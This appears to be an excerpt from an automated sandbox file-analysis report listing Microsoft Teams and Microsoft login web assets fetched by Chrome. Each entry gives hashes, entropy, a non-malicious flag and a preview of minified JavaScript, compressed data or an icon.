                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[237080],{502194:(e,t,n)=>{n.d(t,{p:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("mutation DataResolversBrowserCallingSetIsCallingScreenReadyMutation($teamsCallId:ID!) {setIsCallingScreenReady(teamsCallId:$teamsCallId) @client}");return delete this.definitions,this.definitions=e.definitions}}},14160:(e,t,n)=>{n.d(t,{G:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataResolversBrowserCallingIsCallingScreenReadyQuery($teamsCallId:ID!) {isCallingScreenReady(teamsCallId:$teamsCallId) @client}");return delete this.definitions,this.definitions=e.definitions}}},818072:(e,t,n)=>{n.d(t,{A:()=>a});var i=n(757060),o=n(205007);const a=(e,t)=>{const n=!(0,o.RW)();return(0,i.I)(e,t?{...t,skip:n||t.skip}:{skip:n})}},159320:(e,t,n)=>{n.d(t,{q:()=>l});var i=n(513432),o=n(802756),a=n(881360),s=n(382125),r=n(818072
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):165373
                                                                                                                                                                                                                                                                            Entropy (8bit):4.8580714257855115
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:q6ob04mdMh5vy5Rd5/xxLh0FRhsB7451gB:L4jh5vy5Rd5Z0FRhS743q
                                                                                                                                                                                                                                                                            MD5:2DF7253CB0863CDD3851A62CEC73F84F
                                                                                                                                                                                                                                                                            SHA1:A3FCB7852D064E750EEDE8320900FFF5107B8DA6
                                                                                                                                                                                                                                                                            SHA-256:0D7A2616CADCCE9F872C258983E4B9DBB513A133298D11A578F18AE3CFDF0A79
                                                                                                                                                                                                                                                                            SHA-512:BFD4E5E57450C849C9429B21B19BBC1B03F0545DE454FEC84F0E55E787250205929C8E5B74E5BBA616072EF68C4AF135E2E23846BD102EAA4B195C6D72145C9E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[802756],{802756:(e,t,a)=>{var o;function _(e={},t){return new Proxy(e,{get:(e,a)=>t?a in e?e[a]:t(String(a)):String(a)})}a.d(t,{SQ:()=>o,Cu:()=>n,BQ:()=>r}),function(e){e[e.Expanded=1]="Expanded",e[e.ExpandedAndPacked=2]="ExpandedAndPacked",e[e.Packed=3]="Packed"}(o||(o={}));const i=e=>e.replace(/[A-Z]/g,((e,t)=>0===t?e.toLowerCase():`_${e.toLowerCase()}`)),n=_({SliceSwitch:"activity_slice_switch",FeedListRendered:"feeds_focused_load",FeedListLoadNext:"feeds_focused_load_more",SlicesFeedListRendered:"slices_feeds_focused_load",SlicesFeedListLoadNext:"slices_feeds_focused_load_more",ActivityNameSpaceLoadScenario:"feeds_store_feed_item_namespace_load",AMSMemoryCachePrune:"ams_memory_cache_prune",GetAppPreviewResult:"ext_get_app_preview_result_appbasedlink",AppBasedLink:"ext_app_based_link",AppBasedLinkFetchAppDetails:"ext_app_based_link_fetch_app_details",AppBasedLinkChangedToo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):101278
                                                                                                                                                                                                                                                                            Entropy (8bit):5.180843417705069
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:0MP300ZdOxmeQtfUUY4jWSW+Xdl5zy7PInz3wxg:0MP300ZdOxmeQtfUyjWSW+t3y7PInz33
                                                                                                                                                                                                                                                                            MD5:F6E56D3FEFD068CFA45ECC1A5A8361D2
                                                                                                                                                                                                                                                                            SHA1:5788DCDE05A9F50570F3E5C2A8D7DEB273B62C7D
                                                                                                                                                                                                                                                                            SHA-256:3D82A80E9E6B79FE1AC58517995E09A973B981F150A15FE2C19473FA26D6C78D
                                                                                                                                                                                                                                                                            SHA-512:DF088AC1E6A4D5B61968178C8510562130DEB3C1754C7C58AE7017A5945E248C2AD1D3F6DB4A78BE216E4CA188D6736DF51BD2447ED929BF3E14A75FDAFC628B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/299770-19f9009717d80418.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[299770],{638283:(e,t,r)=>{r.d(t,{$:()=>n,V:()=>a});var n,o=r(709183),i=r(623374);!function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(n||(n={}));var a=function(){function e(e,t){void 0===t&&(t={}),this.level=n.Info;var r=t.correlationId,o=void 0===r?"":r,i=t.level,a=void 0===i?n.Info:i,s=t.piiLoggingEnabled,c=void 0!==s&&s;this.localCallback=e,this.correlationId=o,this.level=a,this.piiLoggingEnabled=c}return e.prototype.logMessage=function(e,t,r){if(!(e>this.level||!this.piiLoggingEnabled&&r)){var a,s=(new Date).toUTCString();a=o.$.isEmpty(this.correlationId)?s+":"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t:s+":"+this.correlationId+"-"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t,this.executeCallback(e,a,r)}},e.prototype.executeCallback=function(e,t,r){this.localCallback&&this.localCallback(e,t,r)},e.prototype.error=function(e){this.logMessage(n.E
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):659293
                                                                                                                                                                                                                                                                            Entropy (8bit):5.659066837306497
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:y7pDzYduNRNAuqoFsdzgylHgrqtX4UjHEcY3ce/rs1186dodt0w:y7pny+shgBww
                                                                                                                                                                                                                                                                            MD5:6600B27DC42661FC872FD25612364556
                                                                                                                                                                                                                                                                            SHA1:01ECE59C2F3E03DC44FA096F4BAA70B70FB4477D
                                                                                                                                                                                                                                                                            SHA-256:A331F0D959EF3A29406FFDCA21C0B82A6C27C097A694C5D7D05915AEFD0F53B9
                                                                                                                                                                                                                                                                            SHA-512:3754CFDB2183798153883D482CC4CE1411C5A811CC13750B401DA792D569C7FC06669E389B36E5617D6D99990291D0DBC0E50256FC143F3BC8999DA3E9E5F547
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/shell-app-99823cb7a224910c.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[443621,847386],{73654:(e,t,i)=>{"use strict";i.d(t,{o:()=>r});var n=i(513432);const{useEffect:a,useRef:o,useState:s}=n;function r(e){const t=o(!1),i=o(new Image),[n,r]=s(!1);return e&&i.current.src!==e&&(i.current.src=e),i.current.onerror=()=>{t.current&&r(!0)},a((()=>(t.current||(t.current=!0),()=>{t.current=!1})),[]),n}},753515:(e,t,i)=>{"use strict";var n,a,o,s,r;i.d(t,{t:()=>s}),function(e){e.EnterKey="EnterKey",e.SearchButton="SearchButton"}(n||(n={})),function(e){e.Relevance="Relevance",e.DateTime="DateTime"}(a||(a={})),function(e){e.Messages="Messages",e.People="People",e.Communities="Communities",e.Files="Files",e.All="All",e.Emails="Emails",e.Meetings="Meetings",e.GroupChats="GroupChats",e.TeamsAndChannels="TeamsAndChannels",e.Default="Default"}(o||(o={})),function(e){e.chat="chat",e.channel="channel"}(s||(s={})),function(e){e[e.THUMBS_DOWN=1]="THUMBS_DOWN",e[e.THUMBS_UP=2]="THUM
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1191)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1299
                                                                                                                                                                                                                                                                            Entropy (8bit):5.243624236595786
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38TMvCam+7wybSqkIozwVDhytW67C7Q42Q/KTozNKSk/qRpat4vQi6yIkY1:wp3sp3eM3Rthu7yQ4okqqbaMQi6yIdln
                                                                                                                                                                                                                                                                            MD5:C9F2D980F1163B95B19052E4A5CE0ABE
                                                                                                                                                                                                                                                                            SHA1:B5EFC49E29265B2AB334F1DFDAA43D6593C189CC
                                                                                                                                                                                                                                                                            SHA-256:ED681F88CD569BE8A4779582EA93900F349DB64DC6F34811A70A26A4314AF8CC
                                                                                                                                                                                                                                                                            SHA-512:260BD1EC7DDB69468C8D21A7F8065110AF032759F966E7FA5BB07193BF9EDBBA6ECD606961831C543DEC4086E36E5FF35FA38DB7BEF624AFE58D4E92295720E9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224316],{224316:(e,a,t)=>{t.d(a,{C:()=>r});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),i=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svgFlippingInRtl},s.createElement("path",{className:n()(i.Q.outline,a.outlinePart),d:"M7.64582 4.14708C7.84073 3.95147 8.15731 3.9509 8.35292 4.14582L13.8374 9.6108C14.0531 9.82574 14.0531 10.1751 13.8374 10.39L8.35292 15.855C8.15731 16.0499 7.84073 16.0493 7.64582 15.8537C7.4509 15.6581 7.45147 15.3415 7.64708 15.1466L12.8117 10.0004L7.64708 4.85418C7.45147 4.65927 7.4509 4.34269 7.64582 4.14708Z"}),s.createElement("path",{className:n()(i.Q.filled,a.filledPart),d:"M7.73271 4.20694C8.03263 3.92125 8.50737 3.93279 8.79306 4.23271L13.7944 9.48318C14.0703 9.77285 14.0703 10.2281 13.7944 10.5178L8.79306 15.7682C8.50737 16.0681 8.03263 1
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64612)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):98301
                                                                                                                                                                                                                                                                            Entropy (8bit):5.449334023795889
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:RS8gIRPY0+r5qnWisLTfM6tQSqLXCIIgbgZ1uXt1EN5eAX:vgDTMnWRwvDIgb0q7Eb9X
                                                                                                                                                                                                                                                                            MD5:D3309DD46ED0E0478209F612E61B8CB0
                                                                                                                                                                                                                                                                            SHA1:E0BC0CDBA5FAFFC463AF7DC7852E7EBDCE1C7134
                                                                                                                                                                                                                                                                            SHA-256:3950B731F6179B238AC80C5A81EF4A69BD63043B92C52FF1E1B9545319C22C20
                                                                                                                                                                                                                                                                            SHA-512:C1553C4A4A2D607F1E71E429763E308F3BAC97FABDAB49A4CC62173998026920F1DBBFAEEA442EF480EC6161132B45F8B30101BF0AD38DC703C17961BEFEBFE0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{1373:function(e,t,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):35168
                                                                                                                                                                                                                                                                            Entropy (8bit):7.99275807202193
                                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                                            SSDEEP:768:FlTfWbX2KT+Hid0L7lumndasuVyeLtCR4sqvrdYnN6UcepZtf/r6:LgbT+Hid0TFbeLtUGvrdCNqepbHr6
                                                                                                                                                                                                                                                                            MD5:D3B6AE9986DF244AB03412CC700335D0
                                                                                                                                                                                                                                                                            SHA1:BAAA1F9899178938F3881F09B18265E47DA806E3
                                                                                                                                                                                                                                                                            SHA-256:CA50059111D30C2E212C90805792EB543548AEF0D4941E886A778E3DCE0B9066
                                                                                                                                                                                                                                                                            SHA-512:755C57FBC9BECE435A477F76C5E8198CA8942C23BE667ACAB83A00E5CD4F54075B10AA07C7FDC10C38FC3D5C0C406C9132FEB5B67BA5BCCC57EF796054A84E7C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js
                                                                                                                                                                                                                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........:..z.>.y..u.....N...^..S.......z~@..;...n...K........x..A]....F.8X&Em..P.s.....a.g.|.d......._..C`.xQ...\..'...QP....?.R.{?....|.>........E4.GRz...z.k.z.}....h..>.{[E.:.....Pu. ..e6_.o.p*.w...>...:...o.k~...~..&E._..}}.}%[. ..#......z.5M.b.....z..k.H.4...l..D.o...z..M.+../..`....?y.J4.=....u.....Z.....E.d.....{0H^...8.....9..h......d..6j......../..z..V<.`.F.xm.y..yt.J....
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4986)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):5094
                                                                                                                                                                                                                                                                            Entropy (8bit):5.51636181102733
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:zpBCu/dgCYkjwLiTSbTkiwO1z7zFrbl4tZDrEshgPgEeLQM/YLFu4a:zpmmjwLiTSbTkiF5PKDrEVIEeUUYxun
                                                                                                                                                                                                                                                                            MD5:B65450E5E3BDED5E0DF059CF41E27EF8
                                                                                                                                                                                                                                                                            SHA1:C5A12EAF609A083B7542CD3AC429E550665CAB53
                                                                                                                                                                                                                                                                            SHA-256:8AE92D7478043DA693389A9C139FCDBE4FED242CD318BB10EB645BF0F4DCD548
                                                                                                                                                                                                                                                                            SHA-512:051B0BCD140770FF42CCD224F4905CFA55422008AB5DA3A714C469CD4BFB9B3D61017FCAB41AA57635E74325D7439E560E171CE562503A9B4D3F88B57B58089F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[986559],{926751:(e,n,t)=>{var r;t.d(n,{B:()=>r}),function(e){e.AuthFailed="AuthFailed",e.AuthResolveFailed="AuthResolveFailed",e.BaseUrlFailedToResolve="BaseUrlFailedToResolve",e.BaseUrlTimeout="BaseUrlTimeout",e.CustomTelemetryFailed="CustomTelemetryFailed",e.FailedToFetch="FailedToFetch",e.InvalidCancellationToken="InvalidCancellationToken",e.InvalidParameters="Invalid pararameters",e.InvalidUrl="InvalidUrl",e.ModelFailedToInitialize="ModelFailedToInitialize",e.ModelTimeOut="ModelTimeOut",e.NotImplemented="NotImplemented",e.RejectHttpError="RejectHttpError",e.RequestCancelled="RequestCancelled",e.RequireStatusFailed="RequireStatusFailed",e.TimedOut="TimedOut",e.TransformFailed="TransformFailed"}(r||(r={}))},72909:(e,n,t)=>{function r(e){return new Promise(((n,t)=>{e<0?t(new Error("negative timeout")):setTimeout(n,e)}))}t.d(n,{y:()=>r})},355515:(e,n,t)=>{t.d(n,{GQ:()=>o,E2:(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):67595
                                                                                                                                                                                                                                                                            Entropy (8bit):5.558511303945331
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:szhEAAFvLtPAH1v+u+WXmpQ52yek8a8M9/Jde8Nb63dfuLaHAOlM3M01oS+ewSHl:oeWHp5dJYxeOq3zm4/HEADQjMNhH
                                                                                                                                                                                                                                                                            MD5:899A8EEA76BE42DAAB6085A5B9B346E9
                                                                                                                                                                                                                                                                            SHA1:5872AFDCA167B53C074B020859111660625583B2
                                                                                                                                                                                                                                                                            SHA-256:E793A190D5297162612A86F34AFA41FE4CB48B3C00A49319A23289D19F70AC6C
                                                                                                                                                                                                                                                                            SHA-512:0AE15C2D6AF256D56FF0D4C83CD2DA5F48160BB3AA4A67215C103E81D0D72DF22FBC5EEE793AD8DA5A621FEC7C5FA01B1E34B5C6565CC1E6EBA7B8AFD3F35115
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[468376],{641939:(e,a,t)=>{t.d(a,{W:()=>r});var r=function(e){return{attributes:{root:{"aria-hidden":e.alt||e["aria-label"]?void 0:"true"}}}}},478176:(e,a,t)=>{t.d(a,{w:()=>n});var r=t(888846),n=function(e){return{attributes:{root:{role:"menu"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:r.E.bidirectionalDomOrder}}}}},792747:(e,a,t)=>{t.d(a,{j:()=>s});var r=t(953543),n=t(504405),s=function(e){var a;return{attributes:{root:(a={role:"menuitem"},a[n.P]=!0,a)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:r.rC.Enter},{keyCode:r.ZG}]}}}}}},39025:(e,a,t)=>{t.d(a,{N:()=>n});var r=t(888846),n=function(e){return{attributes:{root:Object.assign({role:"listbox",tabIndex:-1},e.horizontal&&{"aria-orientation":"horizontal"})},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:r.E.bidirectionalDomOrder}}}}},306749:(e,a,t)=>{t.d(a,{
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65513), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):448430
                                                                                                                                                                                                                                                                            Entropy (8bit):4.73954070512095
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:AB/qzit4k1ed2fgkfbJW7RyvUxpXcTylqfSlX1:ABSjkfbZLg
                                                                                                                                                                                                                                                                            MD5:EA2F3E56C305A4A1E8D998D452F1FD40
                                                                                                                                                                                                                                                                            SHA1:91C9A8E2BBEE6D908D3E55FE6C22BABE6863C654
                                                                                                                                                                                                                                                                            SHA-256:28D37F91A8D7ADD041F3F6C6178A770FA9F13FF463B701F38B951EA701E81B07
                                                                                                                                                                                                                                                                            SHA-512:6D9E20F5A30F1A104D116AE0B5DC8CC3BE32E417C9286D78966A387BCC75CE384AD1CD7020209643EA4F95268B3FBE1D9A7F83218832CC5ABCFCA98C8EFC1A64
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/calling-locale-en-us-e4b3ab3f36dd8759.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[413749],{114623:(e,t,a)=>{a.r(t),a.d(t,{default:()=>i});const i={namespace:"calling",locale:"en-us",translations:{aa_permission_error_header_description:"You are no longer authorized for this auto attendant",acccepted_elsewhere_call_timeline_description_label:"Answered by {{acceptedElsewhereParticipantName}}",active_in_call_with:"is in call with {{caller}}",activity_date_today:"Today",add_a_room_close_button:"Close",add_a_room_enable_bluetooth_subtitle:"Turn on Bluetooth to automatically detect nearby rooms.",add_a_room_no_rooms_text:"Didn't find any Teams rooms nearby",add_a_room_other_suggestions:"Other Suggestions",add_a_room_screen_title:"Nearby Rooms",add_a_room_searching_text:"Searching for nearby Teams Rooms...",add_a_room_title:"Add a room",add_address:"Add",add_address_aria_label:"Add location",add_emergency_address:"Add",add_menu_option:"Add new option",add_new_addr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8753)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):8861
                                                                                                                                                                                                                                                                            Entropy (8bit):4.889317897367703
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:9TX7H7X6xHIWlN+Q4fN+886lp2SXW1BoQDScNvHILSzLtYr8k:9b7Hj6xP4d86I1BoYScNvMSzA
                                                                                                                                                                                                                                                                            MD5:CB840FABB77752725FBBBA7CE3B7D07C
                                                                                                                                                                                                                                                                            SHA1:812ECBAE9B9B2FB5A26A39C53CAE1F66B7D8EB56
                                                                                                                                                                                                                                                                            SHA-256:693E4EE76589A587C66DD4CE12E0ECE09C39306A83F651CF08D789AD8CD2CB87
                                                                                                                                                                                                                                                                            SHA-512:D32F72EBD2FE576331C593C77D682E784596325BFD7BE19FCF9DD0761A0908BF88450BA08DB3B3A02F21377F7B8423361293FA2437D16F42CE093C64732B860C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[232042],{749978:(C,a,l)=>{l.d(a,{o:()=>s});var e=l(957032);const s=(0,l(485529).Ke)({svg:({classes:C})=>(0,e.Y)("svg",{role:"presentation",viewBox:"0 0 32 32",className:C.svg,children:[(0,e.Y)("path",{fill:"#FFF",d:"M28.293 8 24 3.707V7.5c0 .275.225.5.5.5h3.793z"}),(0,e.Y)("g",{fill:"#FFF",children:[(0,e.Y)("path",{d:"M24.5 9c-.827 0-1.5-.673-1.5-1.5V3H9.5c-.275 0-.5.225-.5.5v5.56A9.02 9.02 0 0 1 10 9c4.963 0 9 4.037 9 9s-4.037 9-9 9H9v1.5c0 .275.225.5.5.5h19c.275 0 .5-.225.5-.5V9h-4.5z"}),(0,e.Y)("path",{d:"M24 3.707 28.293 8H24.5a.501.501 0 0 1-.5-.5V3.707z"})]}),(0,e.Y)("path",{opacity:".64",fill:"#605E5C",d:"m29.56 7.854-5.414-5.415A1.51 1.51 0 0 0 23.086 2H9.5C8.673 2 8 2.673 8 3.5v5.732c.328-.075.66-.135 1-.173V3.5c0-.275.225-.5.5-.5H23v4.5c0 .827.673 1.5 1.5 1.5H29v19.5c0 .275-.225.5-.5.5h-19a.501.501 0 0 1-.5-.5V27H8v1.5c0 .827.673 1.5 1.5 1.5h19c.827 0 1.5-.673 1.5-1
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):125499
                                                                                                                                                                                                                                                                            Entropy (8bit):4.8759304145487
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:af4nJeG7LqUs1OnksIdyIYtNUt+rWOKnSRL1lhDytWLaGDAB0kLpVeL0wlyFZ6Yd:qnSRL1lhDytWLaGDAB0kLpV+zb3O
                                                                                                                                                                                                                                                                            MD5:B0C670E3EA088627B07D04A212B5D6F1
                                                                                                                                                                                                                                                                            SHA1:90C9A4112FB925F6AB3F8A430EA17A742E3E27D4
                                                                                                                                                                                                                                                                            SHA-256:70ABAF7F04F17417281D9A3741349AE2B8A2520CD7CE6EF040EA2F897F98812E
                                                                                                                                                                                                                                                                            SHA-512:F50D272FB95E22E67A99880531EECEA1F992A786043E01184B2325FA0E216C5395BC1CE96F80F5B5DA2ECD27310F833555AFF0817E33F302609C288B72C6A70C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[525549],{557681:(e,t,a)=>{a.r(t),a.d(t,{default:()=>n});const n={namespace:"calendar",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",aria_label_new_event_action_buttons:"Create and schedule",attendance_report_tab_text:"Attendance",breakout_rooms_tab_text:"Breakout rooms",breakout_rooms_tab_text_preview:"Breakout rooms (Preview)",broadcast_meeting_text:"Live event",broadcast_object_download_title_format:"Download {{meetingObjectName}}",broadcast_objects_recording_transcript:"Recordings & Transcripts",broadcast_objects_transcript:"Transcript",broadcast_scheduling_meeting_duration_limit_tooltip:"You can broadcast to attendees for no more than {{maxMeetingDuration}} hours",calendar_RSVP:"RSVP",calendar_accepted:"Accepted",calendar_access_error_message:"Teams is unable to access your Calendar",calendar_access_error_secondary_message:"Share the error
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19951)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):20058
                                                                                                                                                                                                                                                                            Entropy (8bit):5.301484485075663
                                                                                                                                                                                                                                                                            Encrypted:false
